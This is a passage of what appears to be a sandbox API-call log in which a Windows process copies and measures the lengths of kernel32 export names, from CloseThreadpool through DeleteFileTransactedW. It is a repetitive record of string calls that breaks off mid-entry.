[0082.110] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.110] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.110] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.110] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.110] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.110] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.110] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.110] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.110] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.110] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.110] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.111] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.111] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.111] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.111] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.111] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.111] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.111] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.111] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.111] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.111] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.111] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.111] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.111] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.111] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.111] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.111] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.111] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.111] lstrlenA (lpString="COPYFILEA") returned 9 [0082.111] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.112] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.112] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.112] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.112] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.112] lstrlenA (lpString="COPYFILEW") returned 9 [0082.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.112] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.112] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.112] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.112] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.112] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.112] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.112] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.112] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.112] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.112] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.112] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.112] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.112] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.112] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.113] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.113] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.113] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.113] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.113] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.113] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.113] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.113] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.113] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.113] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.113] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.113] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.113] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.113] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.113] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.113] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.113] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.113] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.113] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.113] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.114] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.114] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.114] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.114] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.114] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.114] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.114] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.114] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.114] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.114] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.114] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.114] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.114] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.114] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.114] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.114] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.114] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.114] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.114] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.115] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.115] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.115] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.115] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.115] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.115] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.115] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.115] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.115] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.116] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.116] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.116] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.116] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.116] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.116] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.116] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.116] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.116] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.116] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.116] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.116] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.116] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.116] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.116] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.116] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.116] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.116] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.116] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.117] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.117] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.117] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.117] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.117] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.117] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.117] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.117] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.117] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.117] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.117] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.117] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.117] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.117] lstrlenA (lpString="DELETEATOM") returned 10 [0082.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.117] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.117] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.117] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.117] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.117] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.118] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.118] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.118] lstrlenA 